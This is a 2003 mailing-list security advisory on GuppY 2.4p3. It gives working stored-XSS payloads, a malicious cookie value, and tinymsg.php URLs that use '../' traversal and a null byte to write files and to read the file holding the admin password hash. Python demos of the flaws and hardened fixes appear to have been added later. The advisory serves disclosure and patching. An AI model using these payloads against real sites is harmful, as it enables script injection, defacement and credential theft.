[VulnWatch] GuppY : XSS, Files Reading/Writing

From: Frog Man (leseulfrog_at_hotmail.com)
Date: 10/05/03

    To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com
    Date: Sun, 05 Oct 2003 18:24:39 +0200
    
    

    Information:
    °°°°°°°°°°°°
    Language: PHP
    Vulnerable version: 2.4p3 (and possibly earlier)
    Patched version: 2.4p4
    Website: http://www.freeguppy.org
    Problems:
    - Stored (persistent) XSS
    - Arbitrary file read
    - Arbitrary file write

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°

    postguest.php :

    --------------------------------------------------------------------------------------------------------------------
    [...]
        $ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/l\\]", "<a href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
        $ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/L\\]", "<a href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
        $ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/l\\]", "<a href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
        $ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/L\\]", "<a href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
        $ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt);
        $ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt);
        $ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt);
        $ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt);
        $ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt);
        $ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt);
        $ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt);
        $ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt);
    [...]
    --------------------------------------------------------------------------------------------------------------------
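
    The regex chain above copies whatever sits between [l] and [/l] straight into href="..." without escaping, and each family is applied four times (once per case spelling), so output from one pass is re-parsed by the next. The Python below is an added model of that behaviour, not code from GuppY or from this advisory, written in Python rather than PHP so it can be run and checked without a web server. bbcode_links_vulnerable() reproduces the chain; bbcode_links_safe() is a hardened converter placed beside it. The _SAFE_URL whitelist, the rel="noopener noreferrer" attribute and the choice to show the full URL as link text are my assumptions, not anything the project ships. The same principle (escape first, then build markup from validated pieces) also covers the cookie path in inc/includes.inc, where strip_tags($userprefs[6],"<br>") keeps a <br> tag together with any attributes it carries.

```python
import html
import re

# One case-insensitive pattern per family. eregi_replace() already ignores case,
# so the four [l]/[L] spellings in postguest.php are the same pattern run four
# times. The dot in 'www.' is escaped here; the original's unescaped dot matches
# any character but behaves identically for real input.
_WWW = re.compile(r"\[l\]www\.([^\[]*)\[/l\]", re.I)
_PLAIN = re.compile(r"\[l\]([^\[]*)\[/l\]", re.I)
_NAMED = re.compile(r"\[l=([^\[]*)\]([^\[]*)\[/l\]", re.I)


def bbcode_links_vulnerable(ptxt: str) -> str:
    """Model of the postguest.php chain. The captured text lands in href="..."
    verbatim, so a double quote in the tag body closes the attribute and the rest
    is parsed as new attributes (style=, onmouseover=, ...). Running each family
    four times also lets a nested [l][l]...[/l][/l] wrap an already generated
    <a ...> inside a second href, which is what the advisory's second payload does."""
    for _ in range(4):
        ptxt = _WWW.sub(r'<a href="http://www.\1" target=_blank>\1</a>', ptxt)
    for _ in range(4):
        ptxt = _PLAIN.sub(r'<a href="\1" target=_blank>\1</a>', ptxt)
    for _ in range(4):
        ptxt = _NAMED.sub(r'<a href="\1" target=_blank>\2</a>', ptxt)
    return ptxt


# Whitelist for link targets (assumed policy, not GuppY's): absolute http(s) URLs
# only, with no whitespace, quotes, angle brackets or backslashes. javascript:,
# data: and vbscript: can never get through because the scheme is fixed.
_SAFE_URL = re.compile(r"""https?://[^\s<>"'\\`]+""")


def _link(url: str, label: str) -> str:
    """Emit a link with URL and label escaped for attribute and text context."""
    return (f'<a href="{html.escape(url, quote=True)}" target="_blank" '
            f'rel="noopener noreferrer">{html.escape(label, quote=True)}</a>')


def bbcode_links_safe(ptxt: str) -> str:
    """Hardened converter. The whole text is HTML-escaped first, so no user
    character can end an attribute; a tag becomes a link only if its URL passes
    the whitelist, otherwise it stays as literal (escaped) text. Each family runs
    once, so nothing is re-parsed after it has already become HTML."""
    ptxt = html.escape(ptxt, quote=True)

    def www(m):
        url = "http://www." + html.unescape(m.group(1))
        return _link(url, url) if _SAFE_URL.fullmatch(url) else m.group(0)

    def plain(m):
        url = html.unescape(m.group(1))
        return _link(url, url) if _SAFE_URL.fullmatch(url) else m.group(0)

    def named(m):
        url = html.unescape(m.group(1))
        label = html.unescape(m.group(2))
        return _link(url, label) if _SAFE_URL.fullmatch(url) else m.group(0)

    return _NAMED.sub(named, _PLAIN.sub(plain, _WWW.sub(www, ptxt)))


if __name__ == "__main__":
    # Constructed payloads: the advisory's two XSS forms plus a benign link.
    for payload in (
        "[l]\" style=\"background:url('javascript:alert(1)');visibility:hidden;[/l]",
        "[l][l] style=list-style:url(javascript:alert(1)) truc=[/l][/l]",
        "[l]www.example.com/?a=1&b=2[/l]",
    ):
        print("vulnerable:", bbcode_links_vulnerable(payload))
        print("safe:      ", bbcode_links_safe(payload))
```

    Running it shows the first payload turning into `<a href="" style="background:url('javascript:...` under the original logic and into plain escaped text under the hardened one; the benign www link is converted by both.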

    inc/includes.inc, inc/includes_IIS.inc :

    -------------------------------------------------------------------------------
    [...]
    $usercookie = "GuppYUser";
    $userprefs = array();
    if (!empty($HTTP_COOKIE_VARS[$usercookie])) {
      $userprefs = explode("||",$HTTP_COOKIE_VARS[$usercookie]);
      $userprefs[0] = strip_tags($userprefs[0]);
      $userprefs[1] = strip_tags($userprefs[1]);
      $userprefs[2] = strip_tags($userprefs[2]);
      $userprefs[3] = strip_tags($userprefs[3]);
      $userprefs[4] = strip_tags($userprefs[4]);
      $userprefs[5] = strip_tags($userprefs[5]);
      $userprefs[6] = strip_tags($userprefs[6],"<br>");
      if (($userprefs[0] == $lang[0] || $userprefs[0] == $lang[1]) & empty($lng)) {
        $lng = $userprefs[0];
      }
    }
    [...]
    -------------------------------------------------------------------------------

    inc/functions.php :

    --------------------------------------------------------------
    [...]
    function ReadDBFields($fic) {
      global $connector;
      $DataDB = Array();
      if (FileDBExist($fic)) {
        $DataDB = file($fic);
        for ($i = 0; $i < count($DataDB); $i++) {
          $Fields[$i] = explode($connector,trim($DataDB[$i]));
        }
      }
      return $Fields;
    }

    function WriteDBFields($fic,$Fields) {
      global $connector;
      $fhandle = fopen($fic, "w");
      $DataDB = "";
      for ($i = 0; $i < count($Fields); $i++) {
        for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) {
          $DataDB .= trim($Fields[$i][$j]).$connector;
        }
        $DataDB .= trim($Fields[$i][count($Fields[$i])-1])."\n";
      }
      fputs($fhandle, $DataDB);
      fclose($fhandle);
    }
    [...]
    --------------------------------------------------------------

    tinymsg.php :

    -----------------------------------------------------------------------------------------------------------------------------
    [...]
    elseif ($action == 2) {
    [...]
        $dbmsg[0][0] = 0;
        $dbmsg[1][0] = $from;
        $dbmsg[1][1] = GetCurrentDateTime();
        $dbmsg[1][2] = PutBR(RemoveConnector(stripslashes($msg)));
        WriteDBFields($userep.$to.$dbext,$dbmsg);
      }
    [...]
    elseif ($action == 3) {
    ?>
    [...]
      $dbmsg = Array();
      if (FileDBExist($userep.$userprefs[1].$dbext)) {
        $dbmsg = ReadDBFields($userep.$userprefs[1].$dbext);
        for ($i = 1; $i < count($dbmsg); $i++) {

    ?>
    <p><? echo $web6; ?> <b><? echo $dbmsg[$i][0]; ?></b> <? echo $web7." ".FormatDate($dbmsg[$i][1]); ?></p>
    <p><? echo $dbmsg[$i][2]; ?></p>
    <?
          if ($dbmsg[$i][0] != $web214) {
    ?>
    <p align="center">[ <A href ="javascript:PopupWindow('tinymsg.php?lng=<? echo $lng; ?>&action=1&to=<? echo $dbmsg[$i][0]; ?>&from=<? echo $userprefs[1]; ?>','tinywrite',330,245,'no','no')"><? echo $web140; ?></A> ]</p>
    <?
          }
    ?>
    <hr>
    [...]
    -----------------------------------------------------------------------------------------------------------------------------

    Exploits :
    °°°°°°°°

    - [l]" style="background:url('javascript:[SCRIPT]');visibility:hidden;[/l]
      The captured text is inserted into href="..." unescaped, so the quote
      closes the attribute and the rest is parsed as a style attribute.

    - [l][l] style=list-style:url(javascript:[SCRIPT]) truc=[/l][/l]
      The inner tag is converted first; a later pass of the same regex then
      wraps the generated <a ...> inside a second href, again breaking the
      attribute boundaries.

    - With a cookie named "GuppYUser" whose value is:
      fr||[NICK]||[MAIL]||LR||||on||<br style="background:url('javascript:[SCRIPT]')">
      every message you post (forum, guestbook, ...) executes the JavaScript:
      the seventh field only goes through strip_tags($userprefs[6],"<br>"),
      which keeps a <br> tag together with any attributes it carries.

    - http://[target]/tinymsg.php?action=2&from=Youpi!||Great !||rose||10000&msg=1&to=../poll
      adds an option to the current poll: "Youpi!", in pink ("rose" in French),
      with a score of 10000. $to is concatenated into the file name without any
      check, and $from, unlike $msg, is not passed through RemoveConnector(),
      so the "||" separators inject extra fields into the record.

    - http://[target]/tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2
      writes into http://[target]/tadaam.html the lines:
      0
      youpi1||[DATE+TIME]||youpi2
      The null byte ends the file name, so $dbext is never part of the path
      that gets opened.

    - The cookie named "GuppYUser" with the value:
      fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1
      sent to http://[target]/tinymsg.php?action=3 displays the source of
      http://[target]/admin/mdp.php (which contains the MD5-hashed admin
      password): action=3 reads $userep.$userprefs[1].$dbext with the nick
      taken straight from the cookie, and echoes the fields of every line
      after the first.
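
    The three file-system exploits above come down to two defects visible in tinymsg.php: $to and $userprefs[1] are concatenated into $userep.$to.$dbext unchecked (and a %00 cuts the extension off under the PHP of that era), and $from skips RemoveConnector(). The Python below is an added model, not GuppY's code: php4_path() reproduces the vulnerable name construction, resolve_user_db() is a hardened replacement with a nick whitelist and a containment check, and serialize_db_fields() produces the same "||"-joined lines as WriteDBFields(). The nick regex, the .dtb extension, the fixed timestamp and the one-line body of remove_connector() are assumptions; the advisory does not show those values or helper bodies.

```python
import os
import re
import tempfile

CONNECTOR = "||"               # GuppY's $connector: field separator of its flat-file "DB"
DBEXT = ".dtb"                 # assumed value for $dbext; the advisory does not show it
STAMP = "2003-10-05 18:24:39"  # fixed stand-in for GetCurrentDateTime()


def php4_path(userep: str, to: str, dbext: str) -> str:
    """The vulnerable $userep.$to.$dbext concatenation. PHP of that era handed the
    string to the C library, which stops at the first NUL, so '%00' in $to makes
    the forced extension disappear from the path that is actually opened."""
    return (userep + to + dbext).split("\x00", 1)[0]


_NICK = re.compile(r"[A-Za-z0-9_-]{1,32}")  # assumed nick policy; tighten to the site's rules


def resolve_user_db(userep: str, to: str, dbext: str) -> str:
    """Hardened form: whitelist the nick, then check that the resolved path is
    directly inside the user-database directory (defence in depth in case the
    whitelist is ever loosened)."""
    if not _NICK.fullmatch(to):
        raise ValueError(f"rejected nick {to!r}")
    base = os.path.realpath(userep)
    path = os.path.realpath(os.path.join(base, to + dbext))
    if os.path.dirname(path) != base:
        raise ValueError(f"{path} escapes {base}")
    return path


def remove_connector(value: str) -> str:
    """Assumed behaviour of GuppY's RemoveConnector(): keep '||' out of field data."""
    return value.replace(CONNECTOR, "")


def build_message_rows(sender: str, msg: str, *, hardened: bool) -> list:
    """The action=2 record. tinymsg.php sanitises $msg but not $from, so a sender
    such as 'Youpi!||Great !||rose||10000' injects three extra fields into the row."""
    if hardened:
        sender = remove_connector(sender)
    return [["0"], [sender, STAMP, remove_connector(msg)]]


def serialize_db_fields(fields: list) -> str:
    """Same on-disk format as WriteDBFields(): fields joined by '||', one row per line."""
    return "".join(CONNECTOR.join(f.strip() for f in row) + "\n" for row in fields)


def demo() -> dict:
    """Exercise both versions against a throwaway directory tree and report results."""
    out = {}
    with tempfile.TemporaryDirectory() as root:
        real_root = os.path.realpath(root)
        userep = os.path.join(root, "data", "users") + os.sep
        os.makedirs(userep)
        # 1. Null-byte traversal: the vulnerable concatenation lands two levels up.
        out["vuln_target"] = os.path.relpath(
            php4_path(userep, "../../tadaam.html\x00", DBEXT), root)
        # 2. The hardened resolver refuses both advisory payloads ...
        out["rejected"] = []
        for to in ("../poll", "../../tadaam.html\x00"):
            try:
                resolve_user_db(userep, to, DBEXT)
            except ValueError:
                out["rejected"].append(to)
        # ... and still serves a legitimate nick inside the data directory.
        path = resolve_user_db(userep, "alice", DBEXT)
        out["safe_relpath"] = os.path.relpath(path, real_root)
        # 3. Field injection through $from, before and after RemoveConnector().
        injected = "Youpi!||Great !||rose||10000"
        out["vuln_row"] = serialize_db_fields(build_message_rows(injected, "1", hardened=False))
        out["safe_row"] = serialize_db_fields(build_message_rows(injected, "1", hardened=True))
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(out["safe_row"])
        with open(path, encoding="utf-8") as fh:
            out["fields_in_row"] = len(fh.read().splitlines()[1].split(CONNECTOR))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

    The containment check compares os.path.dirname() of the resolved path with the real base directory rather than using a string prefix test, so a sibling directory such as data/users2 cannot slip through; the whitelist alone would already reject every payload in this advisory.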

    Patch/More Details :
    °°°°°°°°°°°°°°°°°°
    http://www.phpsecure.info

    frog-m@n
